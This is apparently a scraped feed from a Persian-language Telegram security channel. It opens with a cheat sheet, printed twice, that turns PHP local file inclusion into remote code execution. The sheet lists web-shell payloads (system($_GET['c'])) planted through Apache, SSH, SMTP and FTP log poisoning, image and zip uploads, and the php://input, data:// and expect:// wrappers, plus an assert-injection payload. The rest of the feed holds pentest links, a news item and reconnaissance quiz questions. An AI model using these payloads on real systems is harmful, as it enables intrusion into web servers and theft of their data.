1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target
.com
/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
———————————————————
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://
/show.php?page=expect://ls
———————————————————
12. input://
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————
@TryHackBox
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target
.com
/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
———————————————————
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://
/show.php?page=expect://ls
———————————————————
12. input://
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————
@TryHackBox
Forwarded from Try Hack Box
Forwarded from Network Penetration Testing
Thick Client Penetration Testing Methodology
https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology
#RedTeam
#pentest
@Network_PenetrationTesting
https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology
#RedTeam
#pentest
@Network_PenetrationTesting
آلن پالر، موسس صنعت امنیت سایبری titan و موسسه SANS، درگذشت
آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفهای آموزش امنیت سایبری را که هر ساله بیش از 40000 فنآور امنیت سایبری را آموزش میدهد، در سال 1989 تأسیس کرد.
ادامه شو میتونید از طریق لینک زیر مطالعه کنید :
https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html
Or
https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/
@TryHackBox
آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفهای آموزش امنیت سایبری را که هر ساله بیش از 40000 فنآور امنیت سایبری را آموزش میدهد، در سال 1989 تأسیس کرد.
ادامه شو میتونید از طریق لینک زیر مطالعه کنید :
https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html
Or
https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/
@TryHackBox
🕊1
کدام یک از موارد زیر بهترین انتخاب برای Footprinting است
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
Anonymous Quiz
40%
15%
42%
Netcraft
4%
Yesware
کدام یک از موارد زیر شامل مجموعه ای از پایگاه های داده در دسترس عموم است
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
Anonymous Quiz
15%
IETF
13%
IANA
72%
Whois
0%
OSRF
Try Hack Box
Photo
یک رکورد SOA جمع آوری شده از یک انتقال منطقه در اینجا نشان داده شده است (عکس بالا).
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
Anonymous Quiz
79%
DNSRV1.anycomp.com, هر 3600 ثانیه
7%
DNSRV1.anycomp.com, هر 600 ثانیه
3%
DNSRV1.anycomp.com, هر 4 ثانیه
10%
postmaster.anycomp.com, هر 600 ثانیه
یک همکار امنیتی در مورد یک حادثه اخیر گیج شده است. یک مهاجم با موفقیت به یک دستگاه در سازمان دسترسی پیدا کرد و با آن خارج شد
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟
#Questions
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟
#Questions
از کدام ابزار یا تکنیک Footprinting می توان برای یافتن نام و آدرس کارمندان یا نقاط فنی تماس استفاده کرد ؟
Anonymous Quiz
68%
whois
7%
nslookup
12%
dig
12%
traceroute
کدام هک گوگل تمام صفحاتی را که کلمات SQL و Version را در عنوان خود دارند نمایش می دهد؟
Anonymous Quiz
29%
inurl:SQL inurl:version
15%
allinurl:SQL version
17%
innoscript:SQL inurl:version
39%
allinnoscript:SQL version
کدام برنامه OSRF بررسی می کند تا ببیند نام کاربری وجود داشته است یا خیر
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
Anonymous Quiz
57%
20%
0%
23%
یک پنتستر در حال تلاش برای استفاده از nslookup است و ابزار را در حالت تعاملی برای جستجو دارد. برای درخواست رکوردهای مناسب از کدام دستور باید استفاده کرد؟
Anonymous Quiz
38%
request type=ns
7%
transfer type=ns
10%
locate type=ns
45%
set type=ns
آیا بحث Reconnaissance متوجه شدید؟
( از کامنت ها هم میتونید استفاده کنید )
( از کامنت ها هم میتونید استفاده کنید )
Anonymous Poll
61%
بله
21%
خیر
18%
متوسط
سلام دوستان در کامنت بنویسید چه دوره هایی را گذروندید یا در حال گذراندن آن هستید میخوام بدونم پست ها رو در چه سطحی ببرم پس نظر بدید . با احترام مدیر کانال unique exploit
مخفف arp چیست ؟
Anonymous Quiz
13%
Address reply protocol
33%
Address request protocol
44%
Address resolution protocol
10%
1 , 2
چه نوع بسته DHCP توسط دستگاه برای بازیابی آدرس IP استفاده می شود؟ #Network
Anonymous Quiz
31%
DHCP ACK
29%
DHCP Discover
28%
DHCP Request
12%
DHCP Offer